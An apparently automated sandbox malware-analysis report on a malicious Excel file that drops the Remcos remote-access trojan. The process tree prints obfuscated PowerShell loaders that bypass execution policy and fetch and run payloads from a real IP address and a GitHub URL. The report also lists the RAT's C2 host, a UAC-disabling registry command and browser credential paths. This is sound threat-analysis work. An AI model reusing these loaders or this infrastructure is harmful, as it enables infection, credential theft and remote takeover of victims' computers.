Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
037002451082_10142024.xls

Overview

General Information

Sample name:037002451082_10142024.xls
Analysis ID:1533041
MD5:0a3e3fee911e89820e0f428e31f8e0ac
SHA1:0000692437d8054df2c2ded80c4c35f6de07a6a0
SHA256:8087bbe34f6bd622a82115c7653470d15ec77183b5cb82e1996fb170b1ace01f
Tags:xlsuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs a global keyboard hook
Installs new ROOT certificates
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3184 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3456 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 3556 cmdline: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 3668 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 3760 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 3768 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3EB6.tmp" "c:\Users\user\AppData\Local\Temp\sknmngfy\CSCD0FFB283197417ABFDFF0C5A9D2FBA3.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • wscript.exe (PID: 3860 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" MD5: 045451FA238A75305CC26AC982472367)
          • powershell.exe (PID: 3904 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
            • powershell.exe (PID: 3996 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • RegAsm.exe (PID: 1884 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
                • RegAsm.exe (PID: 1052 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrecugakrnvunuylxcgmffi" MD5: 8FE9545E9F72E460723F484C304314AD)
                • RegAsm.exe (PID: 3332 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jurvurlefvnzyimponaoqrckug" MD5: 8FE9545E9F72E460723F484C304314AD)
                • RegAsm.exe (PID: 3408 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\toxfvjwftdfeaoitxynhtwpbdvhxj" MD5: 8FE9545E9F72E460723F484C304314AD)
    • mshta.exe (PID: 2764 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 3040 cmdline: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 3044 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 2852 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 1060 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8131.tmp" "c:\Users\user\AppData\Local\Temp\lrugk233\CSC866FCE414411468EBBBEC22B5654CE3.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • wscript.exe (PID: 3568 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" MD5: 045451FA238A75305CC26AC982472367)
          • powershell.exe (PID: 3392 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
            • powershell.exe (PID: 3732 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • RegAsm.exe (PID: 2292 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "idabo.duckdns.org:6875:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-I89M3S", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000014.00000002.650605085.00000000022DE000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x6c4b8:$a1: Remcos restarted by watchdog!
            • 0x6ca30:$a3: %02i:%02i:%02i:%03i
            Click to see the 28 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            14.2.powershell.exe.12d21a28.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              14.2.powershell.exe.12d21a28.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                14.2.powershell.exe.12d21a28.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  14.2.powershell.exe.12d21a28.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x690b8:$a1: Remcos restarted by watchdog!
                  • 0x69630:$a3: %02i:%02i:%02i:%03i
                  14.2.powershell.exe.12d21a28.0.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x6310c:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x63088:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x63088:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x63588:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x63db8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x6317c:$str_b2: Executing file:
                  • 0x641fc:$str_b3: GetDirectListeningPort
                  • 0x63ba8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x63d28:$str_b7: \update.vbs
                  • 0x631a4:$str_b9: Downloaded file:
                  • 0x63190:$str_b10: Downloading file:
                  • 0x63234:$str_b12: Failed to upload file:
                  • 0x641c4:$str_b13: StartForward
                  • 0x641e4:$str_b14: StopForward
                  • 0x63c80:$str_b15: fso.DeleteFile "
                  • 0x63c14:$str_b16: On Error Resume Next
                  • 0x63cb0:$str_b17: fso.DeleteFolder "
                  • 0x63224:$str_b18: Uploaded file:
                  • 0x631e4:$str_b19: Unable to delete:
                  • 0x63c48:$str_b20: while fso.FileExists("
                  • 0x636c1:$str_c0: [Firefox StoredLogins not found]
                  Click to see the 19 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Base64 Encoded PowerShell Command Detected
